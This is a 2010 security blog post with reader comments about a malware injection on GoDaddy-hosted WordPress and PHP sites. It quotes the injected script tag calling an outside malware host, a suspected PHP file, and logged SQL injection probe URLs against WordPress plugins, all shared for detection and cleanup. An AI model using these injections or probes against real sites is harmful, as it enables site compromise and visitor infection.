WordPress sites self-hosted on GoDaddy.com are reporting being maliciously hacked today with <script src=”http:// holasionweb .com/ oo .php”></script>! (Note: We have added spaces in the URL on purpose.)
Warning: This is dangerous malware! Anyone visiting an infected website can get their computers infected, if they do not have a up-to-date anti-virus program using the latest threat definitions. If you receive a message to download anything when visiting an infected site, do NOT click “yes” or “okay” to download.
If your website is infected, put it down for maintenance immediately. There are instructions on how to do so at this post.
We have also received reports that this not only affected WordPress installations, but Joomla and other php-based platforms.
Here's the holasionweb symptoms:
- Infected sites get redirected to a fake AV (scareware).
- Some home pages are not showing the virus, but when clicking on a post or page, you will see the redirect (below).
- Redirects to a blank page at www.1.realsafe-23.net/?……
- Source code reveals <script src=”http:// holasionweb .com/ oo. php”> in the the header section </head> of the infected pages.
How to fix your hacked WordPress site on GoDaddy.com
- We have written up instructions on how to remove malware and restore your WordPress site here.
- David Dede, of Sucuri.net, has written more information about this malware and created a simple clean up solution here.
We have informed Go Daddy's Security Department. We will continuously add updates to this post as they become available.
UPDATE 5/12/2010 at 10:15am: We have heard from Go Daddy. They are aware of this current issue and will be providing us with information soon.
UPDATE 5/12/2010 at 12:00 pm: Here's a statement we just received from Go Daddy to share with you.
Bloggers,
We've identified and are working with the provider and hosting company from where the attacks are originating. With the help of the blogging community, we're close to breaking additional details related to recent malware attacks. Additional information will be provided to the other hosting providers involved in the same situation and the blogging community as available and as appropriate.
In the meantime, we've posted some perspective, additional information and quotable tidbits on the Go Daddy Blog: What's Up with Go Daddy, WordPress, PHP Exploits and Malware?
– Noah Plumb
Go Daddy Communications
UPDATE 5/11/2010 at 2:00pm: We are receiving reports that other hosting companies are infected with this malware. So it is spreading. Thank you for all your comments. We are doing our best to read and approve incoming comments, while we fix hacked websites.
VERY IMPORTANT!!! UPDATE 5/11/2010 at 5:20pm: Change your database password immediately. We are finding some sites that have mystery files contain database information that was copied from the wp-config.php file.
Securely yours,
Regina Smola
Follow me on Twitter
Follow WPSecurityLock on Twitter
Hola
Seguí todas las instrucciones de este blog para asegurar mis blogs, pero de nuevo están hackeados por 3ª vez. Que pasa con Go Daddy???????.
Hacked again!!!!
Site hosted by GoDaddy AND it’s not a WP site.
The first thing I do in the morning, is connecting to FTP server to check out the date when files were modified.
If I see a recent modification to all files (usually happens between 1AM and 4 AM), I just copy over files from my backup.
I really tired of all these recent hackes. I guess it’s time to move all my sites to a new hosting company. 🙁
Well… looks like all hacked files on the first site were overwritten successfully, now I have to check 8 more sites.
Here here I agree! I’ll be moving all of my accounts very very soon!
I got attacked twice. I am moving my hosting away from godaddy. I was referred to a guy that promptly removed the viruses for me, not once but twice. He also restored my blog which was lost after following the advice of the hacks at godaddy. Thank God I had backed my blog up or my blog would have been lost. Here is his name and email: [link edited]
Mine was a little more complicated than just the virus removal the first time around. But today he removed the virus in minutes. I recommend his services and I do not make a penny on this referral. Good luck!
John Rothstein
I’ve found the script added in wp_footer, not wp_head.
It will be more than just the footer, check your complete wp_content file. All of my current template files were hit along with five other sites, not wordpress, however written in php.
It appears to me that this thing modified the .htaccess file and then stuck in an encoded script at the beginning of every php file. Not hard to remove, but super annoying.
I am also continuously being hacked, and on a GoDaddy server. it is starting to get tiring, looking for a permanent solution.
The hack allows them to modify all .php files on the entire server, not just your hosted package.
I don’t even use WordPress, but because I use GoDaddy for shared webhosting, my site was hacked along with everyone else’s accounts on that machine.
I’m moving.
Yep, that’s what I’m thinking too.
I guess me too. I’m tired of GoDaddy.
That would explain why my sites running completely different systems get hacked too.
Anyone, please give us an idea of good hosting company??
I hear inmotionhosting is pretty good. Godaddy is cheap but I would rather pay a little extra for solid tech support than none at all. I hope godaddy goes under, I have lost a ton of time and money this month because of this.
I use Lunar Pages a fair bit. They’re reasonably priced, the servers are fast, and the support is good.
Seriously? My website is hacked for the 3rd time in less than 1 month. Its only a matter of time before I get banned from google and years of work down the drain. What is Godaddy even doing about this? Worst tech support on the planet, half of them don’t even know how to use a computer, let alone fix a hacked website.
I tried your ‘quick fix’ and although it did remove the code, now I can’t even login to my wp-admin. I keep getting a pluggable.php error. :S
Not that it makes things better, but if you do get the Google warning added to your site because of malware, it takes about 1 – 2 days to get removed. You have to contact Google immediately after your site is cleared to get it removed. It happened to a blog on Network Solutions because he went the route of letting the hosting company clean it, which took a day. If you get your site cleaned up within 12 hours it seems, Google doesn’t have enough time to catch on.
WOW!!!!!
6 sites hacked earlier this morning!!!!
All hosted by GoDaddy.
4 wordpress sites.
2 completely different publishing systems.
Guys, I start thinking some unhappy GoDaddy employee modifying our sites. Is it possible?
It would seem like this could possibly be and inside job – but other hosting companies are being hit to. I am wandering if the hosting companies are talking to each other and if there is any kind of consortium of security experts working together on this.
I went through this on some of my client sites on Friday and now I get to do it all over again today?!? I’ve notified GoDaddy (http://www.godaddy.com/securityissue) about it and I wonder if they will blame their customers for having out-of-date WordPress versions again, just as they did for the zettapetta exploit.
My WordPress was current then and it’s current now, so it’s obvious that GoDaddy is better at pointing fingers than they are at addressing the real problem. I’m now happily an ex-customer and don’t worry, I won’t stay long enough to let the door hit my ass on the way out!
From what I can see, the WP install I have on (Godaddy shared linux) hosting hasn’t been infected at all, but it IS running incredibly slowly. Would that be because other sites on my shared hosting account have been infected? I’ve only noticed it in the past few days.
I noticed it too and was wondering what was going on. It’s been like that for about a week for me, even though my site didn’t get compromised until this morning.
HACKED AGAIN!!! Well, I am starting to look for a ner hosting company like Gator. This is just unbelievable. It looks like an “in house” job to me. 4th time atacked in total. Finally found the script in wp-footer.
What I did:
1) Went to wp-config and cleaned it (so I could log into wo-admin)
2) Reinstalled wp with the upgrade
3) Deleted all my template and installed a brand new. (And I has a copy of my index files, home etc clean so that was easy
4) Reinstalled plugins
5) Searched for any php files not covered in the process.
Now it is working but seems like I have to expect it to happen again. I thought it was the same code but it is a whole new attack which means GoDaddy can’t figure the problem out. I am going to call GATOR and see how I can make the switch. I hate messing with my files on the server and database but I think there is no other way.
lol, yep, same hosting package (one out of 3 different ones) done again, the 3rd time in 3 weeks, even as the sites are scheduled into the work queue to be moved imminently.
all WP installations up-to-date and super securitied up. nothing to do with WP whatsoever, a particular machine at Godaddy must be permanently compromised, the hacker can just dial in again at will and do it again whenever they fancy.
I must say after years with no trouble from Godaddy I am shocked at just how $hit they are at this.
So what are our options? Is it time to move? Should we sue? I lost money, clients and traffic. Who wants to go back to an infected site. Even when I tell them that it is cleaned they doubt ever comming back. NOT TO BLAME!
I agree, we should be entitled to something for having to deal with all of this. I have lost money, traffic and my blogs reputation because of this. Every single one of my pages this morning was redirecting to a trojan download. I seriously feel bad for any of my visitors that have to deal with this.
This has been going on for way too long and it needs to stop NOW.
My sentiments, exactly. Lost money, lost traffic, lost reputation. My blog was taking off. Every time these hackers hit is sets me back more.
VERY IMPORTANT!!! UPDATE 5/11/2010 at 5:20pm: Change your database password immediately. We are finding some sites that have mystery files contain database information that was copied from the wp-config.php file.
Gee… I won’t be able to get home till about 9pm. (in about 3 hours) Am I in trouble…. man this is such a huge problem. I am worried now they can get my database. So now they can steal our crao pretty much huh
Thanks for all the updates. WPsecuritylock has been right on top of this since day 1.
I’ll do it just in case but I rally doubt changing the password will help.
How changing the DB password helps if they can access wp-config.php???
Why the hackers modify only site files but do not touch databases if they have full access?
So the latest update here says that it is spreading to other hosting companies. Therefore maybe it is not time to move just yet since using my logic, the first to get the problem usually is the first to solve it. Being go daddy hit so many times they have to be learning. Well… if this truly is going worldwide maybe we are all screwed. HIRE SOME HACKERS TO HACK THE HACKES DANG IT
How do we know if our website has been hacked or not? I’m just starting out with all this internet stuff but got a warning message when i was searching on some site that AVG encountered this virus. Does this mean that I went to a website that was hacked or my websites have been? I just don’t understand but it would be a great help if you guys could help me out.
James,
Thanks for your question. I suggest you get your site monitored for malware to be safe. Here’s our discounted affiliate link: https://wpsecuritylock.com/sucuri. We use them for our website and they rock!
If you want to check your own site or a site that you are on that is PHP based (like WordPress), just view the page source and scroll down to the very bottom. If you see a call for a PHP script near the end (like the holasionweb one mentioned in the first paragraph of this post), then the site is hacked.
I had this problem happen to my site, so I contacted GoDaddy to inform them of the problem. I was very careful not to request any help in actually cleaning up the mess, and I said that I just wanted them to work on their security and not allow it to happen again.
I got the following response AFTER I had cleaned everything:
Dear Sir/Madam,
Thank you for contacting the Hosting Security Team.
We have checked and confirmed that your hosting account economistsdoitwithmodels.com had php files which contained a javascript malware injection. We have since removed the contaminated code as a courtesy. Please note, that this is not a permanent solution because it does not remove the vulnerability that allowed the malicious code to be inserted.
To address the specific vulnerability, please ensure that you fully upgrade all installations of web based software such as WordPress or Joomla to the most recent version.
Ummmmmmm…let’s see. First, plenty of people with WordPress 2.9.2 are reporting this problem, so the GoDaddy people are clearly trying to get people to think that it’s not their fault. Second, I’m not sure I want the GoDaddy people removing anything from my files, ESPECIALLY since they did this without my permission and even without warning. I can only imagine the versioning issues that this could have created.
For the record, if you want to scrub files but don’t want to deal directly with Perl or anything, there’s freeware called TextCrawler that is super helpful. (It can deal with regular expressions and whatnot.) The downside is that you have to get the files to your local machine and back.
Hey,
Same thing here… I called them yesterday, very early morning to report the problem, but my site is not on WP, but Modx CMS, Just like you, I just wanted let them know about the attacks to there servers… first, this guy didnt seem to care or even believed me.
I sent them an email and they said that it must have been my fault for using a very easy to hack password.
I am really thinking on moving to another host, like MediaTemple, and perhaps get my own virtual server or something.
Looks like I moved hosts just in time. After being hacked twice in two weeks on GoDaddy – and then listening to them tell the world it was our fault – I had to go. I will not pay money to a company to be abused like that.
Amazing how I have the same websites, same files and took the same steps as I did over at GoDaddy, yet I am fine now.
I moved multiple websites which took a good deal of time. Like the others who have posted above, I also lost sales, visitors, MONEY and much time cleaning up the hackings.
GoDaddy, it is time to step up and admit your vulnerabilities. Stop blaming WordPress. Stop blaming your hard working customers. And FIX THE PROBLEM.
I’m looking at the poor folks above who are still dealing with this, and it makes me sick.
To those of you looking to switch hosts: do your homework. Get personal referrals to legitimate and secure hosting providers. Do not trust affiliate review sites. And google the heck out of any company you plan to use.
I had decided on one company and upon digging into some research, I found they had their own round of attacks at the start of this year. While no hosting company is immune to hacking, the instances you find should be minimal and not the norm. Also, I looked very carefully at the companies’ responses to customer complaints.
And when you call the company to migrate, tell them that you’ve been hacked multiple times on your current host. Ask them what they are doing to prepare for these attacks, and have them personally walk you through securing your site so that you can minimize your risk.
Any hosting company worth your money will do this for you.
It alsowouldn’t hurt to point them to the YouTube video WPSecurityLock posted of a hacker helping himself to websites hosted on Network Solutions. Tell them you’re not going to put up with that crap.
Migrating is not hard. Don’t be afraid to leave a host who refuses to take your business seriously. We all deserve better.
I did talk to someone yesterday who was in the same boat as you are – same files, same site, moved from Godaddy to HostGator and was not hacked. She didn’t take any extra security measures, change passwords, etc. She just moved hosts and manage to miss the attack that my site has gotten for the third time in a month, even though I have security in place and am fully upgraded to the latest version. So moving is certainly not a bad idea.
I found the easiest solution to this hack here:
http://stackoverflow.com/questions/2798745/how-can-i-remove-an-iframe-virus-from-all-of-php-files-on-my-website
It took about 2 minutes to clean. Very grateful as last time we were hit (last week) it took me hours to fix!
To everyone that has a service request in with WPSecurityLock:
With today’s brute force, malicious attacks, we are backed up on cleaning hacked sites.
Please be patient.
If you are able, upload an Index.html file saying your site is in maintenance.
Go to our previous post and follow the steps in order – https://wpsecuritylock.com/breaking-news-wordpress-hacked-with-zettapetta-on-dreamhost/
Do you think moving from shared hosting to dedicated hosting will help?
It will but only if you actually KNOW how to secure your own server. I use dedicated servers and VPS and can tell you first hand that even with all my technical knowledge it is very time consuming, although – more rewarding 🙂 and I also have noone to blame but myself if there is security problem.
So, make your choice carefully and after considering what you want to do – run business or be sysadmin? 😉
Cheers!
There is a better, faster and easier solution to this holasionweb problem, just read it at tintation.com
Hi Vladimir,
Thanks for your comment. The script great and fast. But… did you check your server to delete the trigger php file? This contains a different injected code that usually is found the day before it shoots into your php files.
Where do we look for this? I need to find it too I guess.
I found a VERY suspicious looking file (I deleted it) on my website named gdform.php. Here is the code it contained (it also had the base 64 encoded code identical to all the other php files at the top)
<?php
$request_method = $_SERVER["REQUEST_METHOD"];
if($request_method == "GET"){
$query_vars = $_GET;
} elseif ($request_method == "POST"){
$query_vars = $_POST;
}
reset($query_vars);
$t = date("U");
$file = $_SERVER['DOCUMENT_ROOT'] . "/../data/gdform_" . $t;
$fp = fopen($file,"w");
while (list ($key, $val) = each ($query_vars)) {
fputs($fp,"n”);
fputs($fp,”$valn”);
fputs($fp,”n”);
if ($key == “redirect”) { $landing_page = $val;}
}
fclose($fp);
if ($landing_page != “”){
header(“Location: http://“.$_SERVER[“HTTP_HOST”].”/$landing_page”);
} else {
header(“Location: http://“.$_SERVER[“HTTP_HOST”].”/”);
}
?>
I wonder how they were able to place this file in my document root?
I just had someone try and log in using the backend with an IP 188.72.213.44!
The webpage was my domain followed by /wp-content/plugins/wordspew/wordspew-rss.php?id=-998877+UNION+SELECT+0,1,0x6875616B,3,4,5–
and the Offending Parameter: id = -998877 UNION SELECT 0,1,0x6875616B,3,4,5–
I don’t have the wordspew plugin.
He also tried using this plugin too
wp-content/plugins/wp-adserve/adclick.php?id=-1+union+select+0x6875616B
Thanks for fixing my blog!